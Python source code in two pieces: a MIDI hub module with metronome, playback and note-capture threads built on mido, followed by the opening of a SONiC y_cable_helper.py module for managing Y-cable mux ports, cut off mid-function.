# atomic.
# Set the program number for the channel.
self._outport.send(
mido.Message(type='program_change', program=program,
channel=_METRONOME_CHANNEL))
self._period = 60. / qpm
self._start_time = start_time
self._stop_time = stop_time
self._velocity = velocity
self._pitches = pitches or _DEFAULT_METRONOME_PITCHES
self._duration = duration
def run(self):
"""Outputs metronome tone on the qpm interval until stop signal received."""
sleeper = concurrency.Sleeper()
while True:
now = time.time()
tick_number = max(0, int((now - self._start_time) // self._period) + 1)
tick_time = tick_number * self._period + self._start_time
if self._stop_time is not None and self._stop_time < tick_time:
break
sleeper.sleep_until(tick_time)
metric_position = tick_number % len(self._pitches)
self._outport.send(
mido.Message(
type='note_on',
note=self._pitches[metric_position],
channel=_METRONOME_CHANNEL,
velocity=self._velocity))
sleeper.sleep(self._duration)
self._outport.send(
mido.Message(
type='note_off',
note=self._pitches[metric_position],
channel=_METRONOME_CHANNEL))
def stop(self, stop_time=0, block=True):
"""Signals for the metronome to stop.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until thread terminates.
"""
self._stop_time = stop_time
if block:
self.join()
class MidiPlayer(threading.Thread):
"""A thread for playing back a NoteSequence proto via MIDI.
The NoteSequence times must be based on the wall time. The playhead matches
the wall clock. The playback sequence may be updated at any time if
`allow_updates` is set to True.
Args:
outport: The Mido port for sending messages.
sequence: The NoteSequence to play.
start_time: The float time before which to strip events. Defaults to
construction time. Events before this time will be sent immediately on
start.
allow_updates: If False, the thread will terminate after playback of
`sequence` completes and calling `update_sequence` will result in an
exception. Otherwise, the the thread will stay alive until `stop` is
called, allowing for additional updates via `update_sequence`.
channel: The MIDI channel to send playback events.
offset: The float time in seconds to adjust the playback event times by.
"""
def __init__(self, outport, sequence, start_time=time.time(),
allow_updates=False, channel=0, offset=0.0):
self._outport = outport
self._channel = channel
self._offset = offset
# Set of notes (pitches) that are currently on.
self._open_notes = set()
# Lock for serialization.
self._lock = threading.RLock()
# A control variable to signal when the sequence has been updated.
self._update_cv = threading.Condition(self._lock)
# The queue of mido.Message objects to send, sorted by ascending time.
self._message_queue = deque()
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Initialize message queue.
# We first have to allow "updates" to set the initial sequence.
self._allow_updates = True
self.update_sequence(sequence, start_time=start_time)
# We now make whether we allow updates dependent on the argument.
self._allow_updates = allow_updates
super(MidiPlayer, self).__init__()
@concurrency.serialized
def update_sequence(self, sequence, start_time=None):
"""Updates sequence being played by the MidiPlayer.
Adds events to close any notes that are no longer being closed by the
new sequence using the times when they would have been closed by the
previous sequence.
Args:
sequence: The NoteSequence to play back.
start_time: The float time before which to strip events. Defaults to call
time.
Raises:
MidiHubException: If called when _allow_updates is False.
"""
if start_time is None:
start_time = time.time()
if not self._allow_updates:
raise MidiHubException(
'Attempted to update a MidiPlayer sequence with updates disabled.')
new_message_list = []
# The set of pitches that are already playing and will be closed without
# first being reopened in in the new sequence.
closed_notes = set()
for note in sequence.notes:
if note.start_time >= start_time:
new_message_list.append(
mido.Message(type='note_on', note=note.pitch,
velocity=note.velocity, time=note.start_time))
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
elif note.end_time >= start_time and note.pitch in self._open_notes:
new_message_list.append(
mido.Message(type='note_off', note=note.pitch, time=note.end_time))
closed_notes.add(note.pitch)
# Close remaining open notes at the next event time to avoid abruptly ending
# notes.
notes_to_close = self._open_notes - closed_notes
if notes_to_close:
next_event_time = (
min(msg.time for msg in new_message_list) if new_message_list else 0)
for note in notes_to_close:
new_message_list.append(
mido.Message(type='note_off', note=note, time=next_event_time))
for msg in new_message_list:
msg.channel = self._channel
msg.time += self._offset
self._message_queue = deque(
sorted(new_message_list, key=lambda msg: (msg.time, msg.note)))
self._update_cv.notify()
@concurrency.serialized
def run(self):
"""Plays messages in the queue until empty and _allow_updates is False."""
# Assumes model where NoteSequence is time-stamped with wall time.
# TODO(hanzorama): Argument to allow initial start not at sequence start?
while self._message_queue and self._message_queue[0].time < time.time():
self._message_queue.popleft()
while True:
while self._message_queue:
delta = self._message_queue[0].time - time.time()
if delta > 0:
self._update_cv.wait(timeout=delta)
else:
msg = self._message_queue.popleft()
if msg.type == 'note_on':
self._open_notes.add(msg.note)
elif msg.type == 'note_off':
self._open_notes.discard(msg.note)
self._outport.send(msg)
# Either keep player alive and wait for sequence update, or return.
if self._allow_updates:
self._update_cv.wait()
else:
break
def stop(self, block=True):
"""Signals for the playback to stop and ends all open notes.
Args:
block: If true, blocks until thread terminates.
"""
with self._lock:
if not self._stop_signal.is_set():
self._stop_signal.set()
self._allow_updates = False
# Replace message queue with immediate end of open notes.
self._message_queue.clear()
for note in self._open_notes:
self._message_queue.append(
mido.Message(type='note_off', note=note, time=time.time()))
self._update_cv.notify()
if block:
self.join()
class MidiCaptor(threading.Thread):
"""Base class for thread that captures MIDI into a NoteSequence proto.
If neither `stop_time` nor `stop_signal` are provided as arguments, the
capture will continue until the `stop` method is called.
Args:
qpm: The quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds when the capture begins. Events
occuring before this time are ignored.
stop_time: The float wall time in seconds when the capture is to be stopped
or None.
stop_signal: A MidiSignal to use as a signal to stop capture.
"""
_metaclass__ = abc.ABCMeta
# A message that is used to wake the consumer thread.
_WAKE_MESSAGE = None
def __init__(self, qpm, start_time=0, stop_time=None, stop_signal=None):
# A lock for synchronization.
self._lock = threading.RLock()
self._receive_queue = Queue.Queue()
self._captured_sequence = music_pb2.NoteSequence()
self._captured_sequence.tempos.add(qpm=qpm)
self._start_time = start_time
self._stop_time = stop_time
self._stop_regex = re.compile(str(stop_signal))
# A set of active MidiSignals being used by iterators.
self._iter_signals = []
# An event that is set when `stop` has been called.
self._stop_signal = threading.Event()
# Active callback threads keyed by unique thread name.
self._callbacks = {}
super(MidiCaptor, self).__init__()
@property
@concurrency.serialized
def start_time(self):
return self._start_time
@start_time.setter
@concurrency.serialized
def start_time(self, value):
"""Updates the start time, removing any notes that started before it."""
self._start_time = value
i = 0
for note in self._captured_sequence.notes:
if note.start_time >= self._start_time:
break
i += 1
del self._captured_sequence.notes[:i]
@property
@concurrency.serialized
def _stop_time(self):
return self._stop_time_unsafe
@_stop_time.setter
@concurrency.serialized
def _stop_time(self, value):
self._stop_time_unsafe = value
def receive(self, msg):
"""Adds received mido.Message to the queue for capture.
Args:
msg: The incoming mido.Message object to add to the queue for capture. The
time attribute is assumed to be pre-set with the wall time when the
message was received.
Raises:
MidiHubException: When the received message has an empty time attribute.
"""
if not msg.time:
raise MidiHubException(
'MidiCaptor received message with empty time attribute: %s' % msg)
self._receive_queue.put(msg)
@abc.abstractmethod
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Must be serialized in children.
Args:
msg: The incoming mido.Message object to capture. The time field is
assumed to be pre-filled with the wall time when the message was
received.
"""
pass
def _add_note(self, msg):
"""Adds and returns a new open note based on the MIDI message."""
new_note = self._captured_sequence.notes.add()
new_note.start_time = msg.time
new_note.pitch = msg.note
new_note.velocity = msg.velocity
new_note.is_drum = (msg.channel == _DRUM_CHANNEL)
return new_note
def run(self):
"""Captures incoming messages until stop time or signal received."""
while True:
timeout = None
stop_time = self._stop_time
if stop_time is not None:
timeout = stop_time - time.time()
if timeout <= 0:
break
try:
msg = self._receive_queue.get(block=True, timeout=timeout)
except Queue.Empty:
continue
if msg is MidiCaptor._WAKE_MESSAGE:
continue
if msg.time <= self._start_time:
continue
if self._stop_regex.match(str(msg)) is not None:
break
with self._lock:
msg_str = str(msg)
for regex, queue in self._iter_signals:
if regex.match(msg_str) is not None:
queue.put(msg.copy())
self._capture_message(msg)
stop_time = self._stop_time
end_time = stop_time if stop_time is not None else msg.time
# Acquire lock to avoid race condition with `iterate`.
with self._lock:
# Set final captured sequence.
self._captured_sequence = self.captured_sequence(end_time)
# Wake up all generators.
for regex, queue in self._iter_signals:
queue.put(MidiCaptor._WAKE_MESSAGE)
def stop(self, stop_time=None, block=True):
"""Ends capture and truncates the captured sequence at `stop_time`.
Args:
stop_time: The float time in seconds to stop the capture, or None if it
should be stopped now. May be in the past, in which case the captured
sequence will be truncated appropriately.
block: If True, blocks until the thread terminates.
Raises:
MidiHubException: When called multiple times with a `stop_time`.
"""
with self._lock:
if self._stop_signal.is_set():
if stop_time is not None:
raise MidiHubException(
'`stop` must not be called multiple times with a `stop_time` on '
'MidiCaptor.')
else:
self._stop_signal.set()
self._stop_time = time.time() if stop_time is None else stop_time
# Force the thread to wake since we've updated the stop time.
self._receive_queue.put(MidiCaptor._WAKE_MESSAGE)
if block:
self.join()
def captured_sequence(self, end_time=None):
"""Returns a copy of the current captured sequence.
If called before the thread terminates, `end_time` is required and any open
notes will have their end time set to it, any notes starting after it will
be removed, and any notes ending after it will be truncated. `total_time`
will also be set to `end_time`.
Args:
end_time: The float time in seconds to close any open notes and after
which to close or truncate notes, if the thread is still alive.
Otherwise, must be None.
Returns:
A copy of the current captured NoteSequence proto with open notes closed
at and later notes removed or truncated to `end_time`.
Raises:
MidiHubException: When the thread is alive and `end_time` is None or the
thread is terminated and `end_time` is not None.
"""
# Make a copy of the sequence currently being captured.
current_captured_sequence = music_pb2.NoteSequence()
with self._lock:
current_captured_sequence.CopyFrom(self._captured_sequence)
if self.is_alive():
if end_time is None:
raise MidiHubException(
'`end_time` must be provided when capture thread is still running.')
for i, note in enumerate(current_captured_sequence.notes):
if note.start_time >= end_time:
del current_captured_sequence.notes[i:]
break
if not note.end_time or note.end_time > end_time:
note.end_time = end_time
current_captured_sequence.total_time = end_time
elif end_time is not None:
raise MidiHubException(
'`end_time` must not be provided when capture is complete.')
return current_captured_sequence
def iterate(self, signal=None, period=None):
"""Yields the captured sequence at every signal message or time period.
Exactly one of `signal` or `period` must be specified. Continues until the
captor terminates, at which point the final captured sequence is yielded
before returning.
If consecutive calls to iterate are longer than the period, immediately
yields and logs a warning.
Args:
signal: A MidiSignal to use as a signal to yield, or None.
period: A float period in seconds, or None.
Yields:
The captured NoteSequence at event time.
Raises:
MidiHubException: If neither `signal` nor `period` or both are specified.
"""
if (signal, period).count(None) != 1:
raise MidiHubException(
'Exactly one of `signal` or `period` must be provided to `iterate` '
'call.')
if signal is None:
sleeper = concurrency.Sleeper()
next_yield_time = time.time() + period
else:
regex = re.compile(str(signal))
queue = Queue.Queue()
with self._lock:
self._iter_signals.append((regex, queue))
while self.is_alive():
if signal is None:
skipped_periods = (time.time() - next_yield_time) // period
if skipped_periods > 0:
tf.logging.warn(
'Skipping %d %.3fs period(s) to catch up on iteration.',
skipped_periods, period)
next_yield_time += skipped_periods * period
else:
sleeper.sleep_until(next_yield_time)
end_time = next_yield_time
next_yield_time += period
else:
signal_msg = queue.get()
if signal_msg is MidiCaptor._WAKE_MESSAGE:
# This is only recieved when the thread is in the process of
# terminating. Wait until it is done before yielding the final
# sequence.
self.join()
break
end_time = signal_msg.time
# Acquire lock so that `captured_sequence` will be called before thread
# terminates, if it has not already done so.
with self._lock:
if not self.is_alive():
break
captured_sequence = self.captured_sequence(end_time)
yield captured_sequence
yield self.captured_sequence()
def register_callback(self, fn, signal=None, period=None):
"""Calls `fn` at every signal message or time period.
The callback function must take exactly one argument, which will be the
current captured NoteSequence.
Exactly one of `signal` or `period` must be specified. Continues until the
captor thread terminates, at which point the callback is called with the
final sequence, or `cancel_callback` is called.
If callback execution is longer than a period, immediately calls upon
completion and logs a warning.
Args:
fn: The callback function to call, passing in the captured sequence.
signal: A MidiSignal to use as a signal to call `fn` on the current
captured sequence, or None.
period: A float period in seconds to specify how often to call `fn`, or
None.
Returns:
The unqiue name of the callback thread to enable cancellation.
Raises:
MidiHubException: If neither `signal` nor `period` or both are specified.
"""
class IteratorCallback(threading.Thread):
"""A thread for executing a callback on each iteration."""
def __init__(self, iterator, fn):
self._iterator = iterator
self._fn = fn
self._stop_signal = threading.Event()
super(IteratorCallback, self).__init__()
def run(self):
"""Calls the callback function for each iterator value."""
for captured_sequence in self._iterator:
if self._stop_signal.is_set():
break
self._fn(captured_sequence)
def stop(self):
"""Stops the thread on next iteration, without blocking."""
self._stop_signal.set()
t = IteratorCallback(self.iterate(signal, period), fn)
t.start()
with self._lock:
assert t.name not in self._callbacks
self._callbacks[t.name] = t
return t.name
@concurrency.serialized
def cancel_callback(self, name):
"""Cancels the callback with the given name.
While the thread may continue to run until the next iteration, the callback
function will not be executed.
Args:
name: The unique name of the callback thread to cancel.
"""
self._callbacks[name].stop()
del self._callbacks[name]
class MonophonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for monophonic melodies."""
def __init__(self, *args, **kwargs):
self._open_note = None
super(MonophonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
If the message is a note_on event, ends the previous note (if applicable)
and opens a new note in the capture sequence. Ignores repeated note_on
events.
If the message is a note_off event matching the current open note in the
capture sequence
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if self._open_note is None or msg.note != self._open_note.pitch:
# This is not the note we're looking for. Drop it.
return
self._open_note.end_time = msg.time
self._open_note = None
elif msg.type == 'note_on':
if self._open_note:
if self._open_note.pitch == msg.note:
# This is just a repeat of the previous message.
return
# End the previous note.
self._open_note.end_time = msg.time
self._open_note = self._add_note(msg)
class PolyphonicMidiCaptor(MidiCaptor):
"""A MidiCaptor for polyphonic melodies."""
def __init__(self, *args, **kwargs):
# A dictionary of open NoteSequence.Note messages keyed by pitch.
self._open_notes = dict()
super(PolyphonicMidiCaptor, self).__init__(*args, **kwargs)
@concurrency.serialized
def _capture_message(self, msg):
"""Handles a single incoming MIDI message during capture.
Args:
msg: The mido.Message MIDI message to handle.
"""
if msg.type == 'note_off' or (msg.type == 'note_on' and msg.velocity == 0):
if msg.note not in self._open_notes:
# This is not a note we're looking for. Drop it.
return
self._open_notes[msg.note].end_time = msg.time
del self._open_notes[msg.note]
elif msg.type == 'note_on':
if msg.note in self._open_notes:
# This is likely just a repeat of the previous message.
return
new_note = self._add_note(msg)
self._open_notes[new_note.pitch] = new_note
class TextureType(object):
"""An Enum specifying the type of musical texture."""
MONOPHONIC = 1
POLYPHONIC = 2
class MidiHub(object):
"""A MIDI interface for capturing and playing NoteSequences.
Ignores/filters `program_change` messages. Assumes all messages are on the
same channel.
Args:
input_midi_port: The string MIDI port name or mido.ports.BaseInput object to
use for input. If a name is given that is not an available port, a
virtual port will be opened with that name.
output_midi_port: The string MIDI port name mido.ports.BaseOutput object to
use for output. If a name is given that is not an available port, a
virtual port will be opened with that name.
texture_type: A TextureType Enum specifying the musical texture to assume
during capture, passthrough, and playback.
passthrough: A boolean specifying whether or not to pass incoming messages
through to the output, applying the appropriate texture rules.
playback_channel: The MIDI channel to send playback events.
playback_offset: The float time in seconds to adjust the playback event
times by.
"""
def __init__(self, input_midi_port, output_midi_port, texture_type,
passthrough=True, playback_channel=0, playback_offset=0.0):
self._texture_type = texture_type
self._passthrough = passthrough
self._playback_channel = playback_channel
self._playback_offset = playback_offset
# When `passthrough` is True, this is the set of open MIDI note pitches.
self._open_notes = set()
# This lock is used by the serialized decorator.
self._lock = threading.RLock()
# A dictionary mapping a compiled MidiSignal regex to a condition variable
# that will be notified when a matching messsage is received.
self._signals = {}
# A dictionary mapping a compiled MidiSignal regex to a list of functions
# that will be called with the triggering message in individual threads when
# a matching message is received.
self._callbacks = defaultdict(list)
# A dictionary mapping integer control numbers to most recently-received
# integer value.
self._control_values = {}
# Threads actively being used to capture incoming messages.
self._captors = []
# Potentially active player threads.
self._players = []
self._metronome = None
# Open MIDI ports.
self._inport = (
input_midi_port if isinstance(input_midi_port, mido.ports.BaseInput)
else mido.open_input(
input_midi_port,
virtual=input_midi_port not in get_available_input_ports()))
self._outport = (
output_midi_port if isinstance(output_midi_port, mido.ports.BaseOutput)
else mido.open_output(
output_midi_port,
virtual=output_midi_port not in get_available_output_ports()))
# Start processing incoming messages.
self._inport.callback = self._timestamp_and_handle_message
def __del__(self):
"""Stops all running threads and waits for them to terminate."""
for captor in self._captors:
captor.stop(block=False)
for player in self._players:
player.stop(block=False)
self.stop_metronome()
for captor in self._captors:
captor.join()
for player in self._players:
player.join()
@property
@concurrency.serialized
def passthrough(self):
return self._passthrough
@passthrough.setter
@concurrency.serialized
def passthrough(self, value):
"""Sets passthrough value, closing all open notes if being disabled."""
if self._passthrough == value:
return
# Close all open notes.
while self._open_notes:
self._outport.send(mido.Message('note_off', note=self._open_notes.pop()))
self._passthrough = value
def _timestamp_and_handle_message(self, msg):
"""Stamps message with current time and passes it to the handler."""
if msg.type == 'program_change':
return
if not msg.time:
msg.time = time.time()
self._handle_message(msg)
@concurrency.serialized
def _handle_message(self, msg):
"""Handles a single incoming MIDI message.
-If the message is being used as a signal, notifies threads waiting on the
appropriate condition variable.
-Adds the message to any capture queues.
-Passes the message through to the output port, if appropriate.
Args:
msg: The mido.Message MIDI message to handle.
"""
# Notify any threads waiting for this message.
msg_str = str(msg)
for regex in list(self._signals):
if regex.match(msg_str) is not None:
self._signals[regex].notify_all()
del self._signals[regex]
# Call any callbacks waiting for this message.
for regex in list(self._callbacks):
if regex.match(msg_str) is not None:
for fn in self._callbacks[regex]:
threading.Thread(target=fn, args=(msg,)).start()
del self._callbacks[regex]
# Remove any captors that are no longer alive.
self._captors[:] = [t for t in self._captors if t.is_alive()]
# Add a different copy of the message to the receive queue of each live
# capture thread.
for t in self._captors:
t.receive(msg.copy())
# Update control values if this is a control change message.
if msg.type == 'control_change':
if self._control_values.get(msg.control, None) != msg.value:
tf.logging.debug('Control change %d: %d', msg.control, msg.value)
self._control_values[msg.control] = msg.value
# Pass the message through to the output port, if appropriate.
if not self._passthrough:
pass
elif self._texture_type == TextureType.POLYPHONIC:
if msg.type == 'note_on' and msg.velocity > 0:
self._open_notes.add(msg.note)
elif (msg.type == 'note_off' or
(msg.type == 'note_on' and msg.velocity == 0)):
self._open_notes.discard(msg.note)
self._outport.send(msg)
elif self._texture_type == TextureType.MONOPHONIC:
assert len(self._open_notes) <= 1
if msg.type not in ['note_on', 'note_off']:
self._outport.send(msg)
elif ((msg.type == 'note_off' or
msg.type == 'note_on' and msg.velocity == 0) and
msg.note in self._open_notes):
self._outport.send(msg)
self._open_notes.remove(msg.note)
elif msg.type == 'note_on' and msg.velocity > 0:
if self._open_notes:
self._outport.send(
mido.Message('note_off', note=self._open_notes.pop()))
self._outport.send(msg)
self._open_notes.add(msg.note)
def start_capture(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Starts a MidiCaptor to compile incoming messages into a NoteSequence.
If neither `stop_time` nor `stop_signal`, are provided, the caller must
explicitly stop the returned capture thread. If both are specified, the one
that occurs first will stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The MidiCaptor thread.
"""
captor_class = (MonophonicMidiCaptor if
self._texture_type == TextureType.MONOPHONIC else
PolyphonicMidiCaptor)
captor = captor_class(qpm, start_time, stop_time, stop_signal)
with self._lock:
self._captors.append(captor)
captor.start()
return captor
def capture_sequence(self, qpm, start_time, stop_time=None, stop_signal=None):
"""Compiles and returns incoming messages into a NoteSequence.
Blocks until capture stops. At least one of `stop_time` or `stop_signal`
must be specified. If both are specified, the one that occurs first will
stop the capture.
Args:
qpm: The integer quarters per minute to use for the captured sequence.
start_time: The float wall time in seconds to start the capture. May be in
the past. Used for beat alignment.
stop_time: The optional float wall time in seconds to stop the capture.
stop_signal: The optional mido.Message to use as a signal to use to stop
the capture.
Returns:
The captured NoteSequence proto.
Raises:
MidiHubException: When neither `stop_time` nor `stop_signal` are provided.
"""
if stop_time is None and stop_signal is None:
raise MidiHubException(
'At least one of `stop_time` and `stop_signal` must be provided to '
'`capture_sequence` call.')
captor = self.start_capture(qpm, start_time, stop_time, stop_signal)
captor.join()
return captor.captured_sequence()
@concurrency.serialized
def wait_for_event(self, signal=None, timeout=None):
"""Blocks until a matching mido.Message arrives or the timeout occurs.
Exactly one of `signal` or `timeout` must be specified. Using a timeout
with a threading.Condition object causes additional delays when notified.
Args:
signal: A MidiSignal to use as a signal to stop waiting, or None.
timeout: A float timeout in seconds, or None.
Raises:
MidiHubException: If neither `signal` nor `timeout` or both are specified.
"""
if (signal, timeout).count(None) != 1:
raise MidiHubException(
'Exactly one of `signal` or `timeout` must be provided to '
'`wait_for_event` call.')
if signal is None:
concurrency.Sleeper().sleep(timeout)
return
signal_pattern = str(signal)
cond_var = None
for regex, cond_var in self._signals:
if regex.pattern == signal_pattern:
break
if cond_var is None:
cond_var = threading.Condition(self._lock)
self._signals[re.compile(signal_pattern)] = cond_var
cond_var.wait()
@concurrency.serialized
def wake_signal_waiters(self, signal=None):
"""Wakes all threads waiting on a signal event.
Args:
signal: The MidiSignal to wake threads waiting on, or None to wake all.
"""
for regex in list(self._signals):
if signal is None or regex.pattern == str(signal):
self._signals[regex].notify_all()
del self._signals[regex]
for captor in self._captors:
captor.wake_signal_waiters(signal)
@concurrency.serialized
def start_metronome(self, qpm, start_time):
"""Starts or updates the metronome with the given arguments.
Args:
qpm: The quarter notes per minute to use.
start_time: The wall time in seconds that the metronome is started on for
synchronization and beat alignment. May be in the past.
"""
if self._metronome is not None and self._metronome.is_alive():
self._metronome.update(qpm, start_time)
else:
self._metronome = Metronome(self._outport, qpm, start_time)
self._metronome.start()
@concurrency.serialized
def stop_metronome(self, stop_time=0, block=True):
"""Stops the metronome at the given time if it is currently running.
Args:
stop_time: The float wall time in seconds after which the metronome should
stop. By default, stops at next tick.
block: If true, blocks until metronome is stopped.
"""
if self._metronome is None:
return
self._metronome.stop(stop_time, block)
self._metronome = None
def start_playback(self, sequence, start_time=time.time(),
allow_updates=False):
"""Plays the notes in aNoteSequence via the MIDI output port.
Args:
sequence: The NoteSequence to play, with times based on the wall clock.
start_time: The float time before which to strip events. Defaults to call
time. Events before this time will be sent immediately on start.
allow_updates: A boolean specifying whether or not the player should stay
allow the sequence to be updated and stay alive until `stop` is
called.
Returns:
The MidiPlayer thread handling playback to enable updating.
"""
player = MidiPlayer(self._outport, sequence, start_time, allow_updates,
self._playback_channel, self._playback_offset)
with self._lock:
self._players.append(player)
player.start()
return player
@concurrency.serialized
def control_value(self, control_number):
"""Returns the most recently received value for the given control number.
Args:
control_number: The integer control number to return the value for, or
None.
Returns:
The most recently recieved integer value for the given control number, or
None if no values have been received for that control.
"""
if control_number is None:
return None
return self._control_values.get(control_number)
def send_control_change(self, control_number, value):
"""Sends the specified control change message on the output port."""
self._outport.send(
mido.Message(
type='control_change',
control=control_number,
value=value))
@concurrency.serialized
def register_callback(self, fn, signal):
"""Calls `fn` at the next signal message.
The callback function must take exactly one argument, which will be the
message triggering the signal.
Survives until signal is called or the MidiHub is destroyed.
Args:
fn: The callback function to call, passing in the triggering message.
signal: A MidiSignal to use as a signal to call `fn` on the triggering
message.
"""
self._callbacks[re.compile(str(signal))].append(fn)
|
y_cable_helper.py | """
y_cable_helper.py
helper utlities configuring y_cable for xcvrd daemon
"""
import copy
import datetime
import os
import re
import threading
import time
from importlib import import_module
from sonic_py_common import daemon_base, logger
from sonic_py_common import multi_asic
from sonic_y_cable import y_cable_vendor_mapping
from swsscommon import swsscommon
from . import sfp_status_helper
from .port_mapping import read_port_config_change
SELECT_TIMEOUT = 1000
y_cable_platform_sfputil = None
y_cable_platform_chassis = None
SYSLOG_IDENTIFIER = "y_cable_helper"
helper_logger = logger.Logger(SYSLOG_IDENTIFIER)
y_cable_port_instances = {}
y_cable_port_locks = {}
Y_CABLE_STATUS_NO_TOR_ACTIVE = 0
Y_CABLE_STATUS_TORA_ACTIVE = 1
Y_CABLE_STATUS_TORB_ACTIVE = 2
y_cable_switch_state_values = {
Y_CABLE_STATUS_NO_TOR_ACTIVE,
Y_CABLE_STATUS_TORA_ACTIVE,
Y_CABLE_STATUS_TORB_ACTIVE
}
MUX_CABLE_STATIC_INFO_TABLE = "MUX_CABLE_STATIC_INFO"
MUX_CABLE_INFO_TABLE = "MUX_CABLE_INFO"
PHYSICAL_PORT_MAPPING_ERROR = -1
PORT_INSTANCE_ERROR = -1
port_mapping_error_values = {
PHYSICAL_PORT_MAPPING_ERROR,
PORT_INSTANCE_ERROR
}
def format_mapping_identifier(string):
"""
Takes an arbitrary string and creates a valid entity for port mapping file.
The input could contain trailing and leading spaces, upper cases etc.
Convert them to what is defined in the y_cable vendor_mapping file.
"""
if not isinstance(string, str):
helper_logger.log_warning(
"Error: mapping identifier is not a string {}".format(string))
return
# create a working copy (and make it lowercase, while we're at it)
s = string.lower()
# remove leading and trailing whitespace
s = s.strip()
# Replace whitespace with underscores
# Make spaces into underscores
s = re.sub(r'\s+', '_', s)
return s
def y_cable_wrapper_get_presence(physical_port):
if y_cable_platform_chassis is not None:
try:
return y_cable_platform_chassis.get_sfp(physical_port).get_presence()
except NotImplementedError:
pass
return y_cable_platform_sfputil.get_presence(physical_port)
def hook_y_cable_simulated(target):
"""
Decorator to add hook for using the simulated y_cable driver.
This decorator checks existence of the configuration file required by the simulated y_cable driver. If the
configuration file is found, then override the "manufacturer" and "model" fields with value "microsoft" and
"simulated" in the collected transceiver info dict. Consequently, instance of the simulated y_cable driver
class will be initialized.
When the configuration file is not found on system, then just return the original transceiver info to initialize
instance of y_cable driver class of whatever actually plugged physical y_cable.
For test systems using simulated y_cable, we can just inject the simulated y_cable driver config file then
restart the pmon service before testing starts.
Args:
target (function): The function collecting transceiver info.
"""
MUX_SIMULATOR_CONFIG_FILE = "/etc/sonic/mux_simulator.json"
VENDOR = "microsoft"
MODEL = "simulated"
def wrapper(*args, **kwargs):
res = target(*args, **kwargs)
if os.path.exists(MUX_SIMULATOR_CONFIG_FILE):
res["manufacturer"] = VENDOR
res["model"] = MODEL
return res
wrapper.__name__ = target.__name__
return wrapper
@hook_y_cable_simulated
def y_cable_wrapper_get_transceiver_info(physical_port):
if y_cable_platform_chassis is not None:
try:
return y_cable_platform_chassis.get_sfp(physical_port).get_transceiver_info()
except NotImplementedError:
pass
return y_cable_platform_sfputil.get_transceiver_info_dict(physical_port)
def get_ycable_physical_port_from_logical_port(logical_port_name, port_mapping):
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_wrapper_get_presence(physical_port):
return physical_port
else:
helper_logger.log_warning(
"Error: Could not establish presence for Y cable port {} while retreiving physical port mapping".format(logical_port_name))
return -1
else:
# Y cable ports should always have
# one to one mapping of physical-to-logical
# This should not happen
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable table port {} while retreiving physical port mapping".format(logical_port_name))
return -1
def get_ycable_port_instance_from_logical_port(logical_port_name, port_mapping):
physical_port_list = port_mapping.logical_port_name_to_physical_port_list(logical_port_name)
if len(physical_port_list) == 1:
physical_port = physical_port_list[0]
if y_cable_wrapper_get_presence(physical_port):
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None:
helper_logger.log_error(
"Error: Could not get port instance from the dict for Y cable port {}".format(logical_port_name))
return PORT_INSTANCE_ERROR
return port_instance
else:
helper_logger.log_warning(
"Error: Could not establish presence for Y cable port {} while trying to toggle the mux".format(logical_port_name))
return PORT_INSTANCE_ERROR
else:
# Y cable ports should always have
# one to one mapping of physical-to-logical
# This should not happen
helper_logger.log_warning(
"Error: Retreived multiple ports for a Y cable table port {} while trying to toggle the mux".format(logical_port_name))
return -1
def set_show_firmware_fields(port, mux_info_dict, xcvrd_show_fw_rsp_tbl):
fvs = swsscommon.FieldValuePairs(
[('version_self_active', str(mux_info_dict["version_self_active"])),
('version_self_inactive', str(mux_info_dict["version_self_inactive"])),
('version_self_next', str(mux_info_dict["version_self_next"])),
('version_peer_active', str(mux_info_dict["version_peer_active"])),
('version_peer_inactive', str(mux_info_dict["version_peer_inactive"])),
('version_peer_next', str(mux_info_dict["version_peer_next"])),
('version_nic_active', str(mux_info_dict["version_nic_active"])),
('version_nic_inactive', str(mux_info_dict["version_nic_inactive"])),
('version_nic_next', str(mux_info_dict["version_nic_next"]))
])
xcvrd_show_fw_rsp_tbl.set(port, fvs)
return 0
def set_result_and_delete_port(result, actual_result, command_table, response_table, port):
fvs = swsscommon.FieldValuePairs([(result, str(actual_result))])
response_table.set(port, fvs)
command_table._del(port)
# Delete port from Y cable status table
def delete_port_from_y_cable_table(logical_port_name, y_cable_tbl):
if y_cable_tbl is not None:
y_cable_tbl._del(logical_port_name)
def update_table_mux_status_for_response_tbl(table_name, status, logical_port_name):
fvs = swsscommon.FieldValuePairs([('response', status)])
table_name.set(logical_port_name, fvs)
helper_logger.log_debug("Y_CABLE_DEBUG: Successful in returning probe port status {}".format(logical_port_name))
def update_table_mux_status_for_statedb_port_tbl(table_name, status, read_side, active_side, logical_port_name):
fvs = swsscommon.FieldValuePairs([('state', status),
('read_side', str(read_side)),
('active_side', str(active_side))])
table_name.set(logical_port_name, fvs)
def y_cable_toggle_mux_torA(physical_port):
port_instance = y_cable_port_instances.get(physical_port)
if port_instance is None:
helper_logger.log_error(
"Error: Could not get port instance for read side for Y cable port {} {}".format(physical_port, threading.currentThread().getName()))
return -1
try:
update_status = port_instance.toggle_mux_to_tor_a()
except Exception as e:
update_status = -1
helper_logger.log_warning("Failed to execute the toggle mux ToR A API for port {} due to {} {}".format(physical_port, repr(e) , threading.currentThread().getName()))
helper_logger.log_debug("Y_CABLE_DEBUG: Status of toggling mux to ToR A for port {} status {} {}".format(physical_port, update_status, threading.currentThread().getName()))
if update_status is True:
return 1
else:
